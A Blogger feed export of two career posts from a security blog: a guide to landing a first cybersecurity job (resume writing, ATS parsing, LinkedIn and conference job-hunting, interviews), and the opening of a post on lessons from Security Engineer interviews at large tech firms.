tag:blogger.com,1999:blog-74214367276771350312024-03-13T20:24:04.050-07:00Cyber CriminalsSecurity Research BlogAmit Sangrahttp://www.blogger.com/profile/02128783782420783002noreply@blogger.comBlogger11125tag:blogger.com,1999:blog-7421436727677135031.post-68811704434766843052020-07-10T05:00:00.004-07:002020-07-10T05:06:20.406-07:00Practical guide to landing your first CyberSec job as a fresh grad<div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-siCJeIca8wA/XwKhmrhWfHI/AAAAAAAAATk/ulcBnN_HiAsLxZmoYFY8qUWEfQCI_WLhgCK4BGAsYHg/s700/looking-for-job-panhandle-tease-today.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="394" data-original-width="700" height="360" src="https://1.bp.blogspot.com/-siCJeIca8wA/XwKhmrhWfHI/AAAAAAAAATk/ulcBnN_HiAsLxZmoYFY8qUWEfQCI_WLhgCK4BGAsYHg/w640-h360/looking-for-job-panhandle-tease-today.jpg" width="640" /></a></div><div><br /></div><div>My plan to land my first cybersecurity job was a promising one, I just had to acquire cybersecurity skills and apply to my favourite company to get hired. It wasn't until I applied to all top companies in earth, moon & mars that I realized even getting shortlisted for an interview can be a daunting task. <br /></div><div><br /></div><div>This was back in January 2017, I was at complete rock bottom, had 0 offers in hand and knew nothing about job hunting. Fast forward 8 months later, I had at least 7 job offers in hand and was starting my career with a Big 4 auditing firm, but most importantly I had learnt the methods & principles required for a victorious job hunt. Till this day I still use them to land myself interview opportunities with top companies such as Facebook, Microsoft, Amazon, HackerOne etc. <br /><br />Students come from different backgrounds and it is very difficult to generalize a job-hunting approach for all but to cover the majority of the strategies I would consider the approach from the perspective of a worst-case scenario (Candidate who can't get opportunities in cybersecurity through college placements and knows zero people in the industry who can give a reference).<br /><br /><span style="color: white;"><font size="5">The approach</font></span></div><div><font size="5"><br /></font></div><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-8GKwJkz3Y_Q/XwboNukMAtI/AAAAAAAAAdc/8qaLCF4YcoUlWvd8TLinqL4iCfR8qGtJACK4BGAsYHg/s1796/Untitled%2BDocument-1.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="721" data-original-width="1796" height="237" src="https://1.bp.blogspot.com/-8GKwJkz3Y_Q/XwboNukMAtI/AAAAAAAAAdc/8qaLCF4YcoUlWvd8TLinqL4iCfR8qGtJACK4BGAsYHg/w589-h237/Untitled%2BDocument-1.jpg" width="589" /></a></div><font size="5"><br /></font></div><div style="text-align: left;"><span style="color: white;"><font size="5">Decide the area of work & gain skills</font></span></div><div><br /></div><div>Going for a job hunt only makes sense if you have acquired sufficient skills required for your desired role. You should do enough research about the types of roles you want to apply and the requirements they have before starting your job hunt process.</div><br />Most of the entry-level cybersecurity roles would require you to have a general cybersecurity & computer science knowledge. Here's what a role looks like from Linked job search if I put the filters <i>"Cyber Security Engineer | Experience: Entry Level"</i><div style="text-align: left;"><font size="5"><font size="3"><br /></font></font></div><div style="text-align: left;"><font size="5"><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-duSBms7En54/XwaVjvTi_eI/AAAAAAAAAYw/YAk-KqtRMpsV0Lw3oYGlsJGbqPv69LxnQCK4BGAsYHg/s1180/Screenshot%2B2020-07-09%2Bat%2B11.56.41%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="890" data-original-width="1180" height="482" src="https://1.bp.blogspot.com/-duSBms7En54/XwaVjvTi_eI/AAAAAAAAAYw/YAk-KqtRMpsV0Lw3oYGlsJGbqPv69LxnQCK4BGAsYHg/w640-h482/Screenshot%2B2020-07-09%2Bat%2B11.56.41%2BAM.png" width="640" /></a></div></font><br /></div><div style="text-align: left;">Although it is not mandatory, It will be a very good decision if you select a specialized domain you want to pursue within cybersecurity early on, that way you can start building your profile around that area and it will be easier for you to make career decision once you move ahead from the trainee role. Some of the common domains are <a href="https://www.blogger.com/#">mentioned here</a>.<font size="5"><font size="3"><br /></font></font></div><div style="text-align: left;"><font size="5"><font size="3"><br /></font></font></div><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-SosqZTe2vdo/Xwb5b0XXuQI/AAAAAAAAAd4/cNmpPi6upq4Dwde_1h3bs6cTl-6kWdFewCK4BGAsYHg/s1229/Screenshot%2B2020-07-09%2Bat%2B11.43.05%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="988" data-original-width="1229" height="514" src="https://1.bp.blogspot.com/-SosqZTe2vdo/Xwb5b0XXuQI/AAAAAAAAAd4/cNmpPi6upq4Dwde_1h3bs6cTl-6kWdFewCK4BGAsYHg/w640-h514/Screenshot%2B2020-07-09%2Bat%2B11.43.05%2BAM.png" width="640" /></a></div><div style="text-align: center;"><br /></div><font size="5"><span style="color: white;">Decide the type of companies you want to work for </span><br /></font></div><div><br /></div><div>In general, there are two types of companies, <b>Consulting</b> (Deloitte, EY, PwC) & <b>Product based</b> (Unilever, Boeing, Sony). In consulting firms, you will typically work on short term projects and get numerous opportunities to do a variety of work. Whereas in product-based firms you will be working on securing a single or handful of products, which will enable you to specialize in one single domain and increase your depth of knowledge. (This is how things work in general but don't be surprised if you experience something different)</div><br /><div>With this you should also decide if you would like working with startups & mid-size firms or large scale companies, the interview & job application process at both these places is slightly different (We'll cover more later). No category of companies is good or bad, the deciding factor should be the choice of work, which is personal to you.</div><br /><div style="text-align: left;"><span style="color: white;"><font size="5">Gain experience if you can</font></span></div><div style="text-align: left;"><br /></div><div style="text-align: left;">The goodness in internships is that the requirements are not that demanding and it's pretty easy to get one (unless applying at top companies), you just need to be aware of the opportunities floating around and apply at the right times.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">This filter on LinkedIn jobs would be the bare minimum you can do to look for opportunities. Just keep that Job Alerts button turned on.<br /></div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/--G6eEI5gFuE/Xwa-mn1eqMI/AAAAAAAAAck/hyIjCMFAhusQyvEl7jfJeh4XoyYaEp4HACK4BGAsYHg/s1080/Screenshot%2B2020-07-09%2Bat%2B2.51.02%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="354" data-original-width="1080" height="131" src="https://1.bp.blogspot.com/--G6eEI5gFuE/Xwa-mn1eqMI/AAAAAAAAAck/hyIjCMFAhusQyvEl7jfJeh4XoyYaEp4HACK4BGAsYHg/w400-h131/Screenshot%2B2020-07-09%2Bat%2B2.51.02%2BPM.png" width="400" /></a></div><div style="text-align: left;"><br /></div><div style="text-align: left;"><span style="color: white;"><font size="5">Prepare your resume</font></span><br /></div><div><br /></div><div>At the beginning of my career, I had the most visually appealing resume you would've ever seen, so good that it would put designers to shame, It was one of those enhancv/resumebuild.com resumes with pie charts, bar graphs etc. Guess how many jobs it landed me? . . . Zero. <br /></div><div><br /></div><div>There were 2 major reasons why that resume didn't perform well:</div><div><b><br /></b></div><div><span style="color: white;"><font size="5">Content:</font></span></div><div><br /></div><div>The same way painting your Toyota bright red won't make it Ferrari, using great looking templates won't make your resume top-notch (*Unless applying for a design role). Content is the king and it will be the deciding factor for getting an interview opportunity or not. The wrong way to approach resume creation is to download a template and fill it with your details; the correct way is to decide the content you want to put in your resume and select a template which is the best match for that.</div><div><br /></div><div>To understand the basics of resume creation here's a good resource <a href="https://www.youtube.com/watch?v=BYUy1yvjHxE" target="_blank">Create Your Resume for Google: Tips and Advice</a> and if you are ready to put additional effort you should definitely read <a href="http://www.thegoogleresume.com/" target="_blank"><span class="st">The Google Résumé.</span></a></div><div><br /></div><div>To get you started, here are the key takeaways from these resources that will make your resume top notch.</div><div><br /></div><div><b>#1 Focus on impact</b></div><div>Not all activities you did within cybersec is worthy of putting in your resume; when describing a task or project, always focus on the impact you had. How does <i>"I am an active bug bounty hunter"</i> sounds vs <i>"As a bug bounty hunter I identified high severity IDOR issue leaking PII information of over 1 million user base"</i>.</div><div><br /></div><div><b>#2 Use action words</b><br />If you haven't heard about them before you should definitely <a href="https://www.thebalancecareers.com/action-verbs-and-power-words-for-your-resume-2063179" target="_blank">check this out</a>. But in a nutshell, action words demonstrate your strengths, highlights & puts a focus on the impact. Achieved, Implemented, Collaborated are few examples of action verbs.</div><div><br /></div><div><b>#3 Customize resume based on the job description (Previously linked Google resume tips video describes more about this)</b></div><div><br /></div><div><b>#4 Describe with metrics & facts </b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-F-49hCsWIHA/XwcJRat9BjI/AAAAAAAAAeU/hOkGUo6CSlcUQapsfjhchzwRnoV-WT7awCK4BGAsYHg/s1024/Without-data-you-re-just-another-person-with-an-opinion..png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="1024" height="156" src="https://1.bp.blogspot.com/-F-49hCsWIHA/XwcJRat9BjI/AAAAAAAAAeU/hOkGUo6CSlcUQapsfjhchzwRnoV-WT7awCK4BGAsYHg/s320/Without-data-you-re-just-another-person-with-an-opinion..png" width="156" /></a></div>You might have the best web app sec skills on the planet and just write "Has good knowledge about OWASP Top 10" on your resume. Meanwhile, on the other hand, the candidate who just started learning web apps yesterday will also write something similar.</div><div><br /></div><div>What differentiates your skills from others? what reason did you give recruiter to choose your profile for an interview over the others?</div><div><br /></div><div>Your skill set should be quantifiable which will give a realistic idea about where you stand, for instance, I have this bullet point on my resume <i>"Accomplished rank 32 in comparison to 400+ participants in Facebook CTF by completing web app security challenges"</i>. This isn't the best accomplishment in the world but draws a realistic picture of where my skill set lies when compared with others. (If you had instances where you performed amazingly well you should definitely put them in, but if you don't have then it won't hurt to put your above-average performances)<br /></div><div><br /></div><div>You will be surprised to know that employers are generous enough to understand that the skill set of a fresh grad can't be compared with an experienced professional and would consider above-average performance as a good sign. (Tip: Wherever possible you should use the formula <i>Accomplished [X] in
comparison to [Y] by doing [Z]</i> to describe the activities you did; that way you can make the activity measurable)<div><br /></div><div><b>Additional Note: </b>If your career profile has some weak points like tier 3 college, no internships, non-cybersec degree etc you should focus more on the accomplishments, they can definitely fill the gaps. Few ideas of accomplishments you can gain are: Participate in a CTF, do a certification, present in reputed conferences, write a research paper, do bug bounties, contribute to open source cybersecurity projects, build something etc.<br /></div></div><div><b><br /></b></div><div><span style="color: white;"><font size="5">ATS Compatibility:</font></span></div><div><br /></div><div>If you haven't heard about ATS before and were having a hard time deciding the best graphical template for your resume, let me make it easier for you, during initial screening your recruiter won't even see your resume template. <br /></div><div><br /></div><div>Once you apply on a career portal, what happens in the background is that your resume is processed by an <a href="https://campustocareer.files.wordpress.com/2011/12/how_ats_reads_resume.png?w=491&h=1975" target="_blank">Applicant Tracking System</a> which extracts the contents out of your resume, scores it (on a scale 1-100), and displays it in a nice dashboard.<br /></div><div><br /></div><div>Here's what your application looks like in WorkDay ATS. (Notice content from the resume is populated in the dashboard?).</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-UH_POYza2ik/XwcLW7tXV5I/AAAAAAAAAew/W5S6iiToXOMV1yn9XssZ3AADJL3e0DWoACK4BGAsYHg/s1296/Screenshot%2B2020-07-06%2Bat%2B6.38.59%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="744" data-original-width="1296" height="368" src="https://1.bp.blogspot.com/-UH_POYza2ik/XwcLW7tXV5I/AAAAAAAAAew/W5S6iiToXOMV1yn9XssZ3AADJL3e0DWoACK4BGAsYHg/w640-h368/Screenshot%2B2020-07-06%2Bat%2B6.38.59%2BPM.png" width="640" /></a></div><div><div><font size="2"><i>Note: Images are of low quality because I cropped them from a product demo video, I'll try to replace them once I find better ones.</i></font></div><div><br /></div></div><div>Another aspect is the scoring mechanism, all candidate resumes will show up as a sorted list (high to low score) and a recruiter will only screen the resumes on first few pages, if you score higher you have better chances of getting screened (Ever wondered why your application at Google never got reviewed?)</div><div><br /></div><div>Now your hacker mindset must be making you think about the <i>exploit.py</i>, how to score higher? let me tell you whatever ideas you have in mind will mostly be valid (Using the same keywords as job description, Keyword frequency etc) but don't get too caught up with this; resume screening is a very minor step in the interview process and you will eventually have to interact with real humans.</div><div><br /></div><div style="text-align: center;"><font size="2"><i>Scored & sorted resumes in WorkDay</i></font></div><div style="text-align: center;"><font size="2"><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-6PBwc3CdU10/XwcL9Ww48NI/AAAAAAAAAfE/tr1dzXewDQcXL_f1lIY7GB3OLpW_ii1zwCK4BGAsYHg/s1640/Screenshot%2B2020-07-06%2Bat%2B6.37.15%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="758" data-original-width="1640" height="296" src="https://1.bp.blogspot.com/-6PBwc3CdU10/XwcL9Ww48NI/AAAAAAAAAfE/tr1dzXewDQcXL_f1lIY7GB3OLpW_ii1zwCK4BGAsYHg/w640-h296/Screenshot%2B2020-07-06%2Bat%2B6.37.15%2BPM.png" width="640" /></a></div><i><br /></i></font></div><div>Finally, a word of caution, visually impressive resume templates typically don't perform well with ATS, to show you a real example I just picked up an email template from Google page #1 Resume Builder and scanned it with another page one ATS, the results tell us that the ATS failed to parse the resume properly.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-ruX5bExNXzY/XwXjUHeTX6I/AAAAAAAAAWM/faJJSnsBZXQLKVsNG-vDat5DN1neLY44QCK4BGAsYHg/s2442/Screenshot%2B2020-07-08%2Bat%2B11.13.06%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1128" data-original-width="2442" height="296" src="https://1.bp.blogspot.com/-ruX5bExNXzY/XwXjUHeTX6I/AAAAAAAAAWM/faJJSnsBZXQLKVsNG-vDat5DN1neLY44QCK4BGAsYHg/w640-h296/Screenshot%2B2020-07-08%2Bat%2B11.13.06%2BPM.png" width="640" /></a></div><div><br /></div><div>Because of this exact same problem, I've completely ditched visual email templates, all I use is a plain word doc with a couple of subheadings, bullet points, white background and black font, it does not look as bad as you might think and gets parsed very well, for the below example I landed the interview by only applying through career portal (no referrals). I won't call myself lucky to get shortlisted out of a couple thousand candidates, I did spend all that time learning about ATS :)</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/--TFSdOIAaeY/XwXwIBTgktI/AAAAAAAAAXE/_0PrQyiNuN0jHRK_8hpdQozZh1BXMCvMgCK4BGAsYHg/s1590/Screenshot%2B2020-07-08%2Bat%2B11.59.25%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="884" data-original-width="1590" height="223" src="https://1.bp.blogspot.com/--TFSdOIAaeY/XwXwIBTgktI/AAAAAAAAAXE/_0PrQyiNuN0jHRK_8hpdQozZh1BXMCvMgCK4BGAsYHg/w400-h223/Screenshot%2B2020-07-08%2Bat%2B11.59.25%2BPM.png" width="400" /></a></div><a href="https://1.bp.blogspot.com/-w7auV_eBpNU/XwL9PMRAZOI/AAAAAAAAAUU/JunMEaKN31c0GmRA0FKvvUinQjiKxcUeQCK4BGAsYHg/s1521/Screenshot%2B2020-07-06%2Bat%2B6.26.35%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><br /></a></div><div>Tip: A resume customized for a specific job description will appear more
relevant to the recruiter and will also score higher within ATS.</div><div><br /></div><div>To summarize, You should know common pitfalls of graphical resume templates and try to strike a perfect balance between making your resume human-readable and ATS parsable. Once you have your resume prepared, you should try it against a couple of freely available ATS tools to see if it's parsable.<br /></div><div><br /></div><div><span style="color: white;"><font size="5">Start applying (</font><font size="5">Job hunting strategies)</font></span><br /><br /></div><div><b>#1 Applying via career portal:</b></div><div>This is the most obvious way to apply for a job, the things to note here are that the success rate of getting shortlisted by applying on career portal of a large scale firm is very low and you need to care about the ATS compatibility & score.</div><div><br /></div>In comparison to this, the success rate of getting shortlisted by small & mid-sized firms is pretty high (if you meet the job criteria) and you don't have to care much about ATS; since the volume of resumes they receive is low, they would typically review all resumes manually.<br /><br />Also, wherever you apply be ready to get ghosted; some companies might not send you a rejection email at all. If you don't hear back within a month or so consider it a dead lead.<br /><b></b><div><br /><b>#2 Conferences & Career Fairs</b><br /></div><div>I never knew how amazing CyberSec conferences can be for getting job opportunities until I attended one. First of all, there will be plenty of companies which will have a trade booth where you can walk up to and discuss career opportunities. I had an experience where a company was running a small CTF challenge, I performed well in it and later on discussed career opportunities, it went well I got an interview. Don't believe me? here's POC.png <br /></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-Kl6Rskx-tFs/Xwa2LJwtnWI/AAAAAAAAAbs/4HOTrJrC8DYxCm5AreEGH3IhvdMWRqsfQCK4BGAsYHg/s800/FB_IMG_1594091298136.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="800" data-original-width="800" height="400" src="https://1.bp.blogspot.com/-Kl6Rskx-tFs/Xwa2LJwtnWI/AAAAAAAAAbs/4HOTrJrC8DYxCm5AreEGH3IhvdMWRqsfQCK4BGAsYHg/w400-h400/FB_IMG_1594091298136.jpg" width="400" /></a></div><div><br /></div><div>Secondly, the open culture in these conferences will provide you with opportunities to interact with other people, you can make very good professional connections who can refer you to very good companies if you play your cards right (Does my FireEye referral sound impressive enough, to make you believe in this strategy?).<br /></div><div><br /></div><div><b>#3 LinkedIn Spam:</b></div><div>Remember how I told you to customize your resume for every job role? this method breaks all the rules we had set earlier, during my job hunt I was asking every cybersec professional out there for opportunities and was applying on all the job postings on LinkedIn. What I discovered was that the success rate of this approach is extremely low and it's not worth it. At one point of time, I had applied literally to hundreds of open positions and my inbox was so flooded with rejection emails that I mistakenly ignored the one's which wanted to proceed with my application, thinking it's another rejection email. :facepalm:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-IjFg_Ty_uMw/Xwar3X8jt_I/AAAAAAAAAZM/l7fpn1ZmRBsCFAQsDHE8hTPIFFjUc_xVACK4BGAsYHg/s1668/Screenshot%2B2020-07-09%2Bat%2B1.30.39%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="853" data-original-width="1668" height="205" src="https://1.bp.blogspot.com/-IjFg_Ty_uMw/Xwar3X8jt_I/AAAAAAAAAZM/l7fpn1ZmRBsCFAQsDHE8hTPIFFjUc_xVACK4BGAsYHg/w400-h205/Screenshot%2B2020-07-09%2Bat%2B1.30.39%2BPM.png" width="400" /></a></div><div><br /></div><div>With that being said it does not mean that this approach doesn't work, it's just that the approach is very aggressive & less productive. It's better to stick to the other strategies which convert well.<br /></div><div><br /></div><div><b>#4 Applying via relevant job posts on LinkedIn:</b></div><div>This is probably the most productive approach amongst all, the strategy is to search for specific keywords on LinkedIn and find relevant entry-level roles.</div><div><br /></div>The search for the keyword <i>"we are hiring cybersecurity graduate"</i> leads me to the following post, these posts are usually created by hiring managers or recruiters and typically don't gain a lot of popularity. You will have to compete with another 15-30 candidates who also noticed the same post; which is a lot better than competing with a couple thousand on a job portal.<div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-tYhaeiIXW70/XwawLDxUmwI/AAAAAAAAAZo/QWTeV0hToj4dMN4UHaXtCsa75fj0Of9bwCK4BGAsYHg/s1668/Screenshot%2B2020-07-09%2Bat%2B1.48.47%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="994" data-original-width="1668" height="382" src="https://1.bp.blogspot.com/-tYhaeiIXW70/XwawLDxUmwI/AAAAAAAAAZo/QWTeV0hToj4dMN4UHaXtCsa75fj0Of9bwCK4BGAsYHg/w640-h382/Screenshot%2B2020-07-09%2Bat%2B1.48.47%2BPM.png" width="640" /></a></div><div><br /></div><div>Ever felt left out thinking about the fact that you know 0 people in the industry who can refer you to a company? well, use the same strategy to get referrals. All you need to do is convince someone ready to refer, that you have the matching skills for the role. <br /></div><div><br /></div><div>It worked well for me once I had already gained some experience but it's doable even without having any experience (great achievements in CyberSec can fill the gap).</div><div><br /></div><div>Note: You should definitely be qualified (or overqualified) when you ask a complete stranger to do you a favour and give you a referral. <br /></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-r6vw1DzDW5U/XwayAQlKZSI/AAAAAAAAAaE/uqYzMvPbcoQ1tz_qYZMervoYZEnChYDKACK4BGAsYHg/s1082/Screenshot%2B2020-07-09%2Bat%2B1.56.56%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="602" data-original-width="1082" height="358" src="https://1.bp.blogspot.com/-r6vw1DzDW5U/XwayAQlKZSI/AAAAAAAAAaE/uqYzMvPbcoQ1tz_qYZMervoYZEnChYDKACK4BGAsYHg/w640-h358/Screenshot%2B2020-07-09%2Bat%2B1.56.56%2BPM.png" width="640" /><br /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-r6vw1DzDW5U/XwayAQlKZSI/AAAAAAAAAaE/uqYzMvPbcoQ1tz_qYZMervoYZEnChYDKACK4BGAsYHg/s1082/Screenshot%2B2020-07-09%2Bat%2B1.56.56%2BPM.png" style="margin-left: 1em; margin-right: 1em;"></a><a href="https://1.bp.blogspot.com/-mrFJ-nDTYjU/XwaygWc71wI/AAAAAAAAAaY/jmkY0H7z7foyoL3Mg2RmvQeuO1ZGbuQUACK4BGAsYHg/s1692/Screenshot%2B2020-07-09%2Bat%2B1.59.47%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="900" data-original-width="1692" height="342" src="https://1.bp.blogspot.com/-mrFJ-nDTYjU/XwaygWc71wI/AAAAAAAAAaY/jmkY0H7z7foyoL3Mg2RmvQeuO1ZGbuQUACK4BGAsYHg/w640-h342/Screenshot%2B2020-07-09%2Bat%2B1.59.47%2BPM.png" width="640" /></a><a href="https://1.bp.blogspot.com/-r6vw1DzDW5U/XwayAQlKZSI/AAAAAAAAAaE/uqYzMvPbcoQ1tz_qYZMervoYZEnChYDKACK4BGAsYHg/s1082/Screenshot%2B2020-07-09%2Bat%2B1.56.56%2BPM.png" style="margin-left: 1em; margin-right: 1em;"></a></div><div><br /></div><div>Alice in the wonderland :)</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-XGsl6On0rtA/Xwa0zQg2bJI/AAAAAAAAAbM/Oj-McGu3O7sqNv1AcLSOFVXaS3cBKAOXQCK4BGAsYHg/s1290/Screenshot%2B2020-07-09%2Bat%2B2.09.32%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="400" data-original-width="1290" height="124" src="https://1.bp.blogspot.com/-XGsl6On0rtA/Xwa0zQg2bJI/AAAAAAAAAbM/Oj-McGu3O7sqNv1AcLSOFVXaS3cBKAOXQCK4BGAsYHg/w400-h124/Screenshot%2B2020-07-09%2Bat%2B2.09.32%2BPM.png" width="400" /></a></div><div><br /></div><div><b>#5 Passive Job Hunting</b><br /></div><div>This might sound counter-intuitive, but if you can build a good career profile you might not need to apply at all. All you need to do is put your accomplishments on LinkedIn, mention in the Title/Profile Pic/Job Preferences that you are open for work and stay a little active on LinkedIn.</div><div><br /></div><div>At least that's how I managed to get most of the interview opportunities, and a chance to work with the best manager ever :)</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-cSTe62hALWI/XwhXx64weUI/AAAAAAAAAfw/MR6gcxvvnvs3YxVetO4Vu-L5yPhsw9NQACK4BGAsYHg/s974/Screenshot%2B2020-07-09%2Bat%2B2.35.55%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="194" data-original-width="974" height="80" src="https://1.bp.blogspot.com/-cSTe62hALWI/XwhXx64weUI/AAAAAAAAAfw/MR6gcxvvnvs3YxVetO4Vu-L5yPhsw9NQACK4BGAsYHg/w400-h80/Screenshot%2B2020-07-09%2Bat%2B2.35.55%2BPM.png" width="400" /></a></div><div><br /></div><div><span style="color: white;"><font size="5">Prepare for the interview</font></span></div><div><br /></div><div>Typically the majority of companies have a technical cybersecurity round and a behavioural round (With exception to top tech firms, I explained their interview process <a href="https://www.cybercriminals.net/2020/07/i-interviewed-as-security-engineer-at.html" target="_blank">here in detail</a>)<br /></div><div><br /></div><div>You can check out <a href="https://medium.com/@krishna14u/my-experience-during-infosec-interviews-ed1f74ce41b8" target="_blank">this compilation of interview questions</a> to prepare for the technical round; you will probably get asked similar questions. And for the behavioural rounds, you will be evaluated based on your ability to work as a team, eagerness to learn new things & ability to resolve conflicts, you can <a href="https://www.youtube.com/watch?v=DINxNbBOEoI" target="_blank">check out this resource to get an idea about these kinds of interviews</a>.</div><div><br /></div><div><span style="color: white;"><font size="5">Evaluate & accept the offer</font></span></div><div><br /></div><div>While evaluating an offer you should always check <a href="https://www.glassdoor.com/Salaries/security-analyst-salary-SRCH_KO0,16.htm" target="_blank">Glassdoor</a> for a rough estimate about the median salary for your role in that specific area, if your offer is at the lower end of the range you can definitely negotiate. Also if you are in a situation where you have multiple offers from an almost similar type of companies your decision should be based on how compassionate your hiring manager is. Starting your career with an amazing manager will help you unlock great opportunities.<br /></div><div><br /></div><div><span style="color: white;"><font size="5">Doing the job</font></span></div><div><font size="5"><br /></font></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-kIrkjx_NReE/XwXzk2ItECI/AAAAAAAAAXg/cB3qtDV5SA4GFaN6NlheW6UB3NvFHLLmACK4BGAsYHg/s666/dogsheep.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="666" data-original-width="500" height="400" src="https://1.bp.blogspot.com/-kIrkjx_NReE/XwXzk2ItECI/AAAAAAAAAXg/cB3qtDV5SA4GFaN6NlheW6UB3NvFHLLmACK4BGAsYHg/w300-h400/dogsheep.jpg" width="300" /></a></div><div><br /></div><div>Finally, remember the <a href="https://www.youtube.com/watch?v=H14bBuluwB8" target="_blank">key to success is grit</a> and taking accountability of your own actions, you possess all the strength you need to make your own future. All the best with your job hunt :)</div><div><br /></div>Amit Sangrahttp://www.blogger.com/profile/02128783782420783002noreply@blogger.com1tag:blogger.com,1999:blog-7421436727677135031.post-16567012231085184062020-07-02T02:30:00.000-07:002020-07-02T02:48:03.932-07:00I interviewed as a Security Engineer at tech giants, here's what I learnt<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-QxmGaBj4KlY/Xv2quMdSXuI/AAAAAAAAATI/eD3CYPJ8tI4vMX1SEF65TOBwlc3aNRQUwCPcBGAYYCw/s1600/GAFAM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="600" data-original-width="1200" height="320" src="https://1.bp.blogspot.com/-QxmGaBj4KlY/Xv2quMdSXuI/AAAAAAAAATI/eD3CYPJ8tI4vMX1SEF65TOBwlc3aNRQUwCPcBGAYYCw/s640/GAFAM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
It all started when I was still in university and developed a prominent interest in web application security that I aspired to get into one of the tech giants(GAFAM companies), but it wasn't until I had already spent 2yrs in the industry, that I finally got a chance to interview at Microsoft, Amazon & Facebook.<br />
<br />
I had started my career doing bug bounties and the positions I got the interviews for were closely related to Web Application Security. To prepare for these interviews I made sure I knew every sophisticated payload out there, I even went to the extent that i started reading research papers to learn what more complex things I could do with very rare vulnerabilities such as RPO based XSS etc<br />
<br />
With those skills, I was pretty confident that I will be able to crack the interviews, Guess how those interviews went? I failed Microsoft in screening round and Amazon, Facebook in Onsite round. The interviews were completely different from the interviews I had done before, that was the time when I realized that I had made a lot of assumptions and those lead me to the failure.<br />
<br />
I have compiled a list of assumptions I had before interviewing at these companies and what I learnt from my failures if you aspire to get into one of the GAFAM companies you can definitely learn from the experiences I had and avoid making the same mistakes<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://preview.redd.it/fyuad9psesx21.jpg?width=960&crop=smart&auto=webp&s=d677cbbeaa6df9b6f04503f81e3f4f84ee9e3771" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="335" data-original-width="800" height="267" src="https://preview.redd.it/fyuad9psesx21.jpg?width=960&crop=smart&auto=webp&s=d677cbbeaa6df9b6f04503f81e3f4f84ee9e3771" width="640" /></a></div>
<br />
<br />
<h3 style="text-align: left;">
<span style="font-size: large;"><span style="color: white;">#1. I am interviewing for offensive security role, I do not need to know about defense</span></span></h3>
Even though you're interviewing for a pentester role, you will still be asked about vulnerability mitigation & remediation. Interviewing for offensive security role is no excuse for not knowing about the defensive side of things and vice-versa<br />
<br />
<h4 style="text-align: left;">
<span style="color: white;"><span style="font-size: large;">#2. I need to know complex payloads & wizard level attack techniques</span></span></h4>
You'll
almost never get interviewed for complex stuff. . . unless you bring it
up. Your interviews will mostly constitute of open-ended questions
which will be asked to explore your breadth & depth of knowledge.<br />
<br />
e.g ., Question: How would you stop malicious bots from attacking your website (Not an actual interview question)<br />
